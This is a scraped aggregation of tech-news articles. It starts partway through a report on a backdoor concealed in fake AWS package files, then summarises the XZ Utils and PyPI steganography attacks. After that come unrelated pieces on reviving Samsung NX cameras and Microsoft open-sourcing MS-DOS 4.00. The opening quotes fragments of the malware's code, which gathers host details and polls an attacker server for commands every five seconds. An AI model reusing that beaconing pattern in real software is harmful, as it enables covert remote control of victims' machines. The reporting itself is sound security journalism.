const clientInfo =     'name': os.hostname(),    'os': os.type() + " " + os.release()  ;  
It then sets up an interval that periodically loops through and fetches commands from the attacker every 5 seconds.
let fetchInterval = 0x1388;  let intervalId = setInterval(fetchAndExecuteCommand, fetchInterval);  
Received commands are executed on the device, and the output is sent back to the attacker on the endpoint /post-results?clientId=.

One of the most innovative methods in recent memory for concealing an open source backdoor was discovered in March, just weeks before it was to be included in a production release of the XZ Utils, a data-compression utility available on almost all installations of Linux. The backdoor was implemented through a five-stage loader that used a series of simple but clever techniques to hide itself. Once installed, the backdoor allowed the threat actors to log in to infected systems with administrative system rights.

The person or group responsible spent years working on the backdoor. Besides the sophistication of the concealment method, the entity devoted large amounts of time to producing high-quality code for open source projects in a successful effort to build trust with other developers.

In May, Phylum disrupted a separate campaign that backdoored a package available in PyPI that also used steganography, a technique that embeds secret code into images.

“In the last few years, we’ve seen a dramatic rise in the sophistication and volume of malicious packages published to open source ecosystems,” Phylum researchers wrote. “Make no mistake, these attacks are successful. It is absolutely imperative that developers and security organizations alike are keenly aware of this fact and are deeply vigilant with regard to open source libraries they consume.”

Here’s how carefully concealed backdoor in fake AWS files escaped mainstream notice Read More »

Samsung’s abandoned NX cameras can be brought online with a $20 LTE stick

Digital Camera, digital cameras, e-waste, firmware, firmware hacking, Open Source, samsung, samsung nx, samsung nx camera, Tech / Kris Guyer / July 9, 2024

Samsung: The Next Big Thing is Here (And Gone) —

All it took was a reverse-engineered camera firmware and a custom API rewrite.

Kevin Purdy – Jul 9, 2024 5: 27 pm UTC

Samsung camera display next to a 4G LTE modem stick — Enlarge / Under-powered Samsung camera, meet over-powered 4G LTE dongle. Now work together to move pictures over the air.

Georg Lukas

Back in 2010—after the first iPhone, but before its camera was any good—a mirrorless, lens-swapping camera that could upload photos immediately to social media or photo storage sites was a novel proposition. That’s what Samsung’s NX cameras promised.

Unsurprisingly, Samsung didn’t keep that promise too much longer after it dropped its camera business and sales numbers disappeared. It tried out the quirky idea of jamming together Android phones and NX cameras in 2013, providing a more direct means of sending shots and clips to Instagram or YouTube. But it shut down its Social Network Services (SNS) entirely in 2021, leaving NX owners with the choices of manually transferring their photos or ditching their cameras (presuming they had not already moved on).

Some people, wonderfully, refuse to give up. People like Georg Lukas, who reverse-engineered Samsung’s SNS API to bring back a version of direct picture posting to Wi-Fi-enabled NX models, and even expand it. It was not easy, but at least the hardware is cheap. By reflashing the surprisingly capable board on a USB 4G dongle, Lukas is able to create a Wi-Fi hotspot with LTE uplink and run his modified version of Samsung’s (woefully insecure) service natively on the stick.

What is involved should you have such a camera? Here’s the shorter version of Lukas’ impressive redux:

Installing Debian on the LTE dongle’s board
Creating a Wi-Fi hotspot on the stick using NetworkManager
Compiling Lukas’ own upload server, written in Flask and Python
Configuring the web server now running on that dongle

The details of how Lukas reverse-engineered the firmware from a Samsung WB850F are posted on his blog. It is one of those Internet blog posts in which somebody describes something incredibly arcane, requiring a dozen kinds of knowledge backed by experience, with the casualness with which one might explain how to plant seeds in soil.

The hardest part of the whole experiment might be obtaining the 4G LTE stick itself. The Hackaday blog has detailed this stick (and also tipped us to this camera rebirth project), which is a purpose-built device that can be turned into a single-board computer again, on the level of a Pi Zero W2, should you apply a new bootloader and stick Linux on it. You can find it on Alibaba for very cheap—or seemingly find it, because some versions of what looks like the same stick come with a far more limited CPU. You’re looking for a stick with the MSM8916 inside, sometimes listed as a “QualComm 8916.”

Lukas’ new version posts images to Mastodon, as demonstrated in his proof of life post. It could likely be extended to more of today’s social or backup services, should he or anybody else have the time and deep love for what are not kinda cruddy cameras. Here’s hoping today’s connected devices have similarly dedicated hackers in the future.

Samsung’s abandoned NX cameras can be brought online with a $20 LTE stick Read More »

Microsoft open-sources infamously weird, RAM-hungry MS-DOS 4.00 release

MS-DOS, Open Source, Tech / Paul Patrick / April 27, 2024

a road not traveled —

DOS 4.00 was supposed to add multitasking to the OS, but it was not to be.

Andrew Cunningham – Apr 26, 2024 5: 30 pm UTC

Microsoft has open-sourced another bit of computing history this week: The company teamed up with IBM to release the source code of 1988’s MS-DOS 4.00, a version better known for its unpopularity, bugginess, and convoluted development history than its utility as a computer operating system.

The MS-DOS 4.00 code is available on Microsoft’s MS-DOS GitHub page along with versions 1.25 and 2.0, which Microsoft open-sourced in cooperation with the Computer History Museum back in 2014. All open-source versions of DOS have been released under the MIT License.

Initially, MS-DOS 4.00 was slated to include new multitasking features that allow software to run in the background. This release of DOS, also sometimes called “MT-DOS” or “Mutitasking MS-DOS” to distinguish it from other releases, was only released through a few European PC OEMs and never as a standalone retail product.

The source code Microsoft released this week is not for that multitasking version of DOS 4.00, and Microsoft’s Open Source Programs Office was “unable to find the full source code” for MT-DOS when it went to look. Rather, Microsoft and IBM have released the source code for a totally separate version of DOS 4.00, primarily developed by IBM to add more features to the existing non-multitasking version of DOS that ran on most IBM PCs and PC clones of the day.

Microsoft never returned to its multitasking DOS idea in subsequent releases. Multitasking would become the purview of graphical operating systems like Windows and OS/2, while MS-DOS versions 5.x and 6.x continued with the old one-app-at-a-time model of earlier releases.

Microsoft has released some documentation and binary files for MT-DOS and “may update this release if more is discovered.” The company credits English researcher Connor “Starfrost” Hyde for shaking all of this source code loose as part of an ongoing examination of MT-DOS that he is documenting on his website. Hyde has posted many screenshots of a 1984-era build of MT-DOS, including of the “session manager” that it used to track and switch between running applications.

Confidential copies of the obscure, abandoned multitasking-capable version of MS-DOS 4.00. Microsoft has been unable to locate source code for this release, sometimes referred to as “MT-DOS” or “Multitasking MS-DOS.”

Microsoft

The publicly released version of MS-DOS 4.00 is known less for its new features than for its high memory usage; the 4.00 release could consume as much as 92KB of RAM, way up from the roughly 56KB used by MS-DOS 3.31, and the 4.01 release reduced this to about 86KB. The later MS-DOS 5.0 and 6.0 releases maxed out at 72 or 73KB, and even IBM’s PC DOS 2000 only wanted around 64KB.

These RAM numbers would be rounding errors on any modern computer, but in the days when RAM was pricey, systems maxed out at 640KB, and virtual memory wasn’t a thing, such a huge jump in system requirements was a big deal. Today’s retro-computing enthusiasts still tend to skip over MS-DOS 4.00, recommending either 3.31 for its lower memory usage or later versions for their expanded feature sets.

Microsoft has open-sourced some other legacy code over the years, including those older MS-DOS versions, Word for Windows 1.1a, 1983-era GW-BASIC, and the original Windows File Manager. While most of these have been released in their original forms without any updates or changes, the Windows File Manager is actually actively maintained. It was initially just changed enough to run natively on modern 64-bit and Arm PCs running Windows 10 and 11, but it’s been updated with new fixes and features as recently as March 2024.

The release of the MS-DOS 4.0 code isn’t the only new thing that DOS historians have gotten their hands on this year. One of the earliest known versions of 86-DOS, the software that Microsoft would buy and turn into the operating system for the original IBM PC, was discovered and uploaded to the Internet Archive in January. An early version of the abandoned Microsoft-developed version of OS/2 was also unearthed in March.

Microsoft open-sources infamously weird, RAM-hungry MS-DOS 4.00 release Read More »